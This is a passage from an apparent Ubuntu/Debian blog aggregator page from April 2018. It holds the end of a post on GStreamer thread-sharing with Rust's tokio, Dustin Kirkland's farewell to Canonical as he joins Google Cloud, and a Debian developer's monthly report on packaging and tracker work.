Take these numbers with caution, the real test-case in Mathieu’s blog post will show the improvements in the bigger picture, where it was generally a quarter of CPU usage and almost perfect parallelization when increasing the number of contexts.

Conclusion

Generally this was a fun exercise and we’re quite happy with the results, especially the real results. It took me some time to understand how tokio works internally so that I can implement all kinds of customizations on top of it, but for normal usage of tokio that should not be required and the overall design makes a lot of sense to me, as well as the way how futures are implemented in Rust. It requires some learning and understanding how exactly the API can be used and behaves, but once that point is reached it seems like a very productive and performant solution for asynchronous IO. And modelling asynchronous IO problems based on the Rust-style futures seems a nice and intuitive fit.

The performance measurements also showed that GStreamer’s default usage of threads is not always optimal, and a model like in upipe or pipewire (or rather SPA) can provide better performance. But as this also shows, it is possible to implement something like this on top of GStreamer and for the common case, using threads like in GStreamer reduces the cognitive load on the developer a lot.

For a future version of GStreamer, I don’t think we should make the threading “manual” like in these two other projects, but instead provide some API additions that make it nicer to implement thread-sharing elements and to add ways in the GStreamer core to make streaming threads non-blocking. All this can be implemented already, but it could be nicer.

All this “only” improved the number of threads, and thus the threading and context switching overhead. Many other optimizations in other areas are still possible on top of this, for example optimizing receive performance and reducing the number of memory copies inside the pipeline even further. If that’s something you would be interested in, feel free to get in touch.

And with that: Read Mathieu’s upcoming blog posts about the other parts, RTP jitterbuffer / RTCP timer thread sharing, and no allocations, and the full benchmark.

on April 05, 2018 03:21 PM

April 04, 2018


A couple of months ago, I reflected on "10 Amazing Years of Ubuntu and Canonical".  Indeed, it has been one hell of a ride, and that post is merely the tip of the proverbial iceberg...

The people I've met, the things I've learned, the places I've been, the users I've helped, the partners I've enabled, the customers I've served -- these are undoubtedly the most amazing and cherished experiences of my professional career to date.

And for the first time in my life, I can fully and completely grok the Ubuntu philosophy:
I am who I am, because of who we all are
With all my heart, I love what we've created in Ubuntu, I love the products that we've built at Canonical, I love each and every person involved.

So, it is with mixed emotion that the Canonical chapter of my life comes to a close and a new one begins...

Next week, I have the honor and privilege to join the Google Cloud product management team, and work beside so, so, so, so many people who continue to inspire me.

Words fail to express how excited I am about this opportunity!  In this new role, I will be working closely with Aparna Sinha, Michael Rubin, and Tim Hockin, and I hope to see many of you at KubeCon Europe in Copenhagen later this month.

My friends and family will be happy to know that we're staying here in Austin, and I'll be working from the Google Austin office with my new team, largely based in Sunnyvale, California.

The Ubuntu community can expect to see me remaining active in the Ubuntu developer community as a Core Dev and a MOTU, and I will continue to maintain many of the dozens of open source projects and packages that so many of you have come to rely upon.  Perhaps I'll even become more active upstream in Debian, if the Debian community will have me there too :-)

Finally, an enormous THANK YOU to everyone who has made this journey through Ubuntu and Canonical such a warm, rewarding, emotional, exceptional experience!

Cheers,
@DustinKirkland
on April 04, 2018 11:48 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Distro Tracker

I reviewed and merged 14 merge requests from multiple contributors:

On top of this, I updated the Salsa/AliothMigration wiki page with information about how to best leverage tracker.debian.org when you migrate to salsa.

I also filed a few issues for bugs or things that I’d like to see improved:

I also gave my feedback about multiple mockups prepared by Chirath R in preparation of his Google Summer of Code project proposal.

Security Tools Packaging Team

Following the departure of alioth, the new list that we requested on lists.debian.org has been created: https://lists.debian.org/debian-security-tools/

I updated (in the git repositories) all the Vcs-* and all the Maintainer fields of the packages maintained by the team.

I prepared and uploaded afflib 3.7.16-3 to fix RC bug #892599. I sponsored rhash 1.3.6 for Aleksey Kravchenko, ccrypt 1.10-5 for Alexander Kulak and ledger-wallets-udev 0.1 for Stephne Neveu.

Debian Live

This project also saw an unexpected resurgence of activity and I had to review and merge many merge requests:

It’s nice to see two derivatives being so active in upstreaming their changes.

Misc stuff

Hamster time tracker. I was regularly hit a by a bug leading to a gnome-shell crash (leading to a graphical session crash due to the design of wayland) and this time I decided that enough was enough so I started to dig in the code and did my best to fix the issues I encountered. During the month, I tested multiple versions and submitted three pull requests. Right now, the version in git is working fine for me. Still, it really smells of a bad design that mistakes in shell extensions can have such dramatic consequences.

Packaging. I forwarded #892063 to upstream in a new ticket. I updated zim to version 0.68 (final release replacing release candidate that I had already packaged). I filed #893083 suggesting that the hello source package should be a model for other packages and as such it should have a git repository hosted on salsa.debian.org.

Sponsorship. I sponsored pylint-django 0.9.4-1 for Joseph Herlant. I also sponsored urwid 2.0.1-1 (new upstream version), xlwt 1.3.0-1 (new version with python 3 support), elastalert 0.1.29-1 (new upstream release and RC bug fix) which have been updated for Freexian customers.

Thanks

See you next month for a new summary of my activities.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

on April 04, 2018 10:22 AM